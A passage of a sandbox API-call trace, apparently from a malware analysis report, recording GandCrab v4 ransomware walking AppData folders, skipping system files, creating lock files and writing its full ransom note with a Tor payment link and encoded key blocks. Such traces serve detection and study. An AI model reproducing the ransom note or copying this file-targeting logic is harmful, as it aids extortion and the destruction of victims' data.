flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.798] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Application Data\\\\KRAB-DECRYPT.txt") returned 65 [0099.798] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Application Data\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\local\\application data\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0099.799] GetLastError () returned 0x50 [0099.799] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.799] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.800] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2e, wMilliseconds=0x3e5)) [0099.800] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.800] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0099.800] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0099.800] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Application Data\\d2ca4a08d2ca4dee3d.lock") returned 71 [0099.800] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Application Data\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\appdata\\local\\application data\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0xffffffff [0099.801] GetLastError () returned 0x50 [0099.801] GetLastError () returned 0x50 [0099.801] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.801] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.801] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0099.801] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0099.801] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0099.801] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Default\\AppData\\Local\\d2ca4a08d2ca4dee3d.lock" [0099.801] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.802] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Local\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 59 [0099.802] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\d2ca4a08d2ca4dee3d.lock") returned 54 [0099.802] lstrlenW (lpString=".lock") returned 5 [0099.802] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.802] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0099.802] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.802] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.803] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0099.803] lstrcmpW (lpString1="History", lpString2=".") returned 1 [0099.803] lstrcmpW (lpString1="History", lpString2="..") returned 1 [0099.803] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\", lpString2="History" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\History") returned="C:\\Users\\Default\\AppData\\Local\\History" [0099.803] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\History", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\History\\") returned="C:\\Users\\Default\\AppData\\Local\\History\\" [0099.803] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0099.803] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0099.803] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0099.803] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0099.803] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0099.803] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.804] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.804] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Local\\History\\\\KRAB-DECRYPT.txt") returned 56 [0099.804] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\History\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\local\\history\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0099.807] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0099.807] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338ed20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338ed20*=0x1f6e, lpOverlapped=0x0) returned 1 [0099.808] CloseHandle (hObject=0x3a8) returned 1 [0099.808] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.808] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.809] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0xd)) [0099.809] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.809] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0099.809] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0099.809] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Local\\History\\d2ca4a08d2ca4dee3d.lock") returned 62 [0099.809] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\History\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\appdata\\local\\history\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3a8 [0099.810] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.810] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.811] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\History\\") returned 39 [0099.811] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\History\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\History\\*") returned="C:\\Users\\Default\\AppData\\Local\\History\\*" [0099.811] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\History\\*", lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0xffffffff [0099.811] CloseHandle (hObject=0x3a8) returned 1 [0099.811] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0099.811] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0099.811] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0099.811] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\KRAB-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\Local\\KRAB-DECRYPT.txt" [0099.811] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.812] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Local\\KRAB-DECRYPT.txt.KRAB") returned 52 [0099.812] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\KRAB-DECRYPT.txt") returned 47 [0099.812] lstrlenW (lpString=".txt") returned 4 [0099.812] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.812] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0099.812] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.812] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\KRAB-DECRYPT.txt") returned 47 [0099.812] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\KRAB-DECRYPT.txt") returned 47 [0099.812] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0099.813] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0099.813] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0099.813] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0099.813] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0099.813] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0099.813] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0099.813] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0099.813] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0099.813] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0099.813] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.813] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0099.813] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0099.813] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0099.813] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\", lpString2="Microsoft" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft" [0099.813] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft\\" [0099.813] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0099.814] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0099.814] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0099.814] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0099.814] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0099.814] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.814] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.814] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\\\KRAB-DECRYPT.txt") returned 58 [0099.815] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0099.816] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0099.816] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338ed20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338ed20*=0x1f6e, lpOverlapped=0x0) returned 1 [0099.817] CloseHandle (hObject=0x3a8) returned 1 [0099.817] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.818] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.818] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0xd)) [0099.818] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.818] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0099.818] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, 